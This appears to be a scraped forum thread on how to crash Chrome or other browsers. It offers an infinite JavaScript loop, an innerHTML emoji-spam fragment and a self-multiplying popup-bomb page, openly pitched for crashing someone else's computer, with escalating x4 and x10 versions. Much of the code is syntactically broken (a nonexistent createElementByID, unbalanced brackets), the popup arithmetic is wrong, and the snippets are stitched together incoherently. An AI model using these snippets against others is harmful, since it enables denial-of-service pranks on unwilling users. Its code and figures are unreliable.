How to crash Chrome browser?

for(var i = 0; i === i; i++) {}

should crash your current window

there is one way...

var dp = document.getElementByID("spamr");
  var dp = document.createElementByID("spamr");
  dp.innerHTML += "🤍🤍🤍🤍🤍🤍🤍🤍🤍🤍";
dp.innerHTML += "🤍🤍🤍🤍🤍🤍🤍🤍🤍🤍🤍";

<!DOCTYPE html>

<h2>Crashing Now</h2>

<p>Hit Ok To Crash</p>

<p id="demo"></p>

onbeforeunload = function(){localStorage.x=1};

if(confirm("Do you REALLY want me to crash your browser?")){
  }, 1000)


WARNING this will crash ANY browser or the computer using PopUps attack:

If you want to crash somebodies computer or browser

PopUp CODE that CRASHES a browser or computer

<script type="text/javascript"> 
function CrashAndBurn(url) { popupWindow = url,'popUpWindow','height=181,width=666,left=3,top=222') }
<body onload="JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');">

If you really want to make their browser seriously hang up, you use this popup it will continue to uploading with 2 more and 2 more popup pages for each popup that means 2x2 popups second time 4 popups then 8, 16, 32, 64 and so on popups. It makes as if was a virus it will spread PopUps in the browser, filling the screen with popups till either the computer or the browser crashes and hangs up and shuts down, just...

NOTE: You did not hear this from me OKAY... LOL... I ONLY advice this as a piratical joke on a friend and not for an online web page.

If you wish to make it crash faster then just add more JavaScript:CrashAndBurn(self.location,'_blank'); to onload body like this example x4:

<body onload="JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');">

It will load 4 popups for each popup that emans after 4 popups it will load 4x4 meaning 18 popups and then 18x4 that is 72 and then 72x4 that is 288 popups and then 288x4 that is 1152 popups just in 4 rounds of popups in a few seconds.

And if you want to be EXTREME HORRIBLE then use x10 example:

<body onload="JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');">

and you have 8 popups with 10 that is 10x10=100 popups and then 1000 and after that 1 000 000 popups and GUARANTEED crash fast.

EDIT You can use a while loop instead of copy-pasting 10 times. It would be much shorter.